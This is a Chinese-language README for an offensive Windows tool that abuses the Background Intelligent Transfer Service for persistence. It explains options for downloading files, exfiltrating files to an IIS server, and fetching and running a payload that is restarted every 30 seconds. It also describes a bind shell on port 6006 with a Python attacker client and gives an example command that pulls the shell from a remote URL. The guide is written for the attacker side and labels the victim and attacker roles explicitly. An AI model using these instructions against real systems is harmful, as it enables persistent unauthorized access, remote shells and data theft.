这是一个利用 Windows 后台智能传输服务(BITS)的持久化工具。
文件下载、文件外传、文件下载 + 持久化执行
以管理员身份运行 shepard.exe,并附带以下命令行参数:
-d <remoteLocation> <writePath> :将文件常规下载到你选择的本地路径
-e <remoteLocation> <localPath> :从你选择的本地路径常规上传文件(仅发送到 IIS 服务器,这是 BITS 的限制)
-dr <remoteLocation> <writePath> [optionalFileArgs] :将文件下载到你选择的路径,并尝试维持持久化。下载的文件将尝试以 optionalFileArgs 参数运行,BITS 每 30 秒检查一次,确保文件仍在受感染系统上运行。
运行此可执行文件时不带参数或参数数量不正确,shepard 将干净退出。
服务器(受害者)使用 C# 编写,监听端口 6006。
运行 shepardsbind_serv.exe,不带任何参数。
客户端(攻击者)使用 Python 编写,接受一个参数:受害者机器的 IP 地址。
shepardsbind_recv.py <victim's IP>
运行 shepardsbind_recv.py 时不带参数将返回错误。
受害者机器上唯一必须存在的可执行文件是 shepard.exe。将下载的 bindshell 可执行文件托管在可公开访问的位置。 Shepard 将下载并运行 bindshell 可执行文件,之后用户即可使用 Python 接收器。如果 shell 被发现并终止,它将在 30 秒后重新启动。
示例:shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe